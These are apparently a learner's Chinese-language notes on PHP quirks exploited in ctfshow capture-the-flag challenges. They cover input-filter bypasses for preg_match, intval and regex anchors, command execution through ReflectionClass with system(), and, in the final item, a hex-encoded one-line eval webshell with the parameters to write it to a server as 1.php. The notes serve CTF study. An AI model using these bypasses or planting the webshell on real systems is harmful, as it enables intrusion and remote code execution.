这里是根据ctfshow php特性做的题积累的知识
1.preg_match()函数
可以利用数组绕过,因为preg_match只能处理字符串,所以当传入的subject是数组时会返回false
2.intval()函数!!!
如果是字符串,它返回的内容取决于字符串最左侧的字符。如intval(‘11a0’)=11。所有输入的内容加上一个字母,就可以绕过和满足上述的两个条件限制。
当弱比较不能等于xxx,intval()结果是xxx时
试试e这个字母,e这个字母比较特殊,可以在PHP中不是科学计数法。比如4476e123在intval()中=4476
转换进制可以绕过过滤,16进制前加0x,8进制前加0,如4476=010574
把0过滤了可以试试加小数点绕过,或者用加号或者空格绕过,如4476.0,+4476(+的话,url解码会认为是空格,或者输入%2b,解码为+,空格%20,或者(space)也可以绕过。)
+号绕过和进制绕过是可以叠加使用的
3.和$这种的正则匹配,只匹配一行。但是正则匹配/m可以执行多行匹配。
所以第一层条件是多行匹配php,第二层条件是单行匹配,这样就可以用换行符%0a绕过。
例子:
f(preg_match('/^php$/im', $a)){
if(preg_match('/^php$/i', $a)){,
看到有/m就可以尝试
4.php三元运算符,
三元运算符:条件表达式?表达式1:表达式2=>条件为真,结果是表达式1;条件为假,结果是表达式2。
举例
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']'flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']'flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:FILE);
有点晕,慢慢分析
1,先设定了一个$_GET 变量为数组,如果$_GET 变量不为空,则$_GET 变量和$_POST 变量指向同一个地址,即$_POST 变量内容改变,会影响$_GET 变量的内容。如果为空,整个三元表达式的结果为’flag’。就是如果echo这段代码的话,返回结果是flag。
2,$_GET['flag']'flag'?$_GET=&$_COOKIE:'flag';
如果flag变量值为’flag’,则$_GET 变量和$_COOKIE 变量指向同一个地址;否则返回flag。
3,$_GET['flag']'flag'?$_GET=&$_SERVER:'flag';
如果flag变量值为’flag’,则$_GET 变量和$_SERVER 变量指向同一个地址;否则返回flag。
4,highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:FILE);
高亮输出结果。如果HTTP_FLAG变量值为’flag’,输出$flag,否则输出当前文件。
5,$_GET?$_GET=&$_POST:'flag';
如果执行了get传参让HTTP_FLAG=flag,那么也需要post传参相同。
5.is_numeric()函数
is_numeric() 函数用于检测变量是否为数字或数字字符串。
var_dump()函数可以输出多个值,一般需要变量输出多个字符串的时候使用
6.反射类Reflectionclass
官方解释为 ‘可以与已定义的类建立映射关系,通过反射类可以对类操作’并且‘反射类不仅仅可以建立对类的映射,也可以建立对PHP基本方法的映射,并且返回基本方法执行的情况。因此可以通过建立反射类new ReflectionClass(system('cmd'))来执行命令“
也就是说,这个函数可以返回代码运行结果,通常是echo new ReflectionClass,然后另一个变量输入命令,等后面继续遇到这种题在看看吧
7.hex2bin函数
hex2bin函数可以将16进制的数字转换为字符串,is_numeric在php5的环境中,是可以识别十六进制的,可以根据这个传马,举个例子
首先将我们的一句话编码成16进制
0x3c3f706870206576616c28245f504f53545b315d293b3f3e
接着直接传入v2=0x3c3f706870206576616c28245f504f53545b315d293b3f3e&v3=1.php
post:v1=hex2bin
即可完成木马的写入。
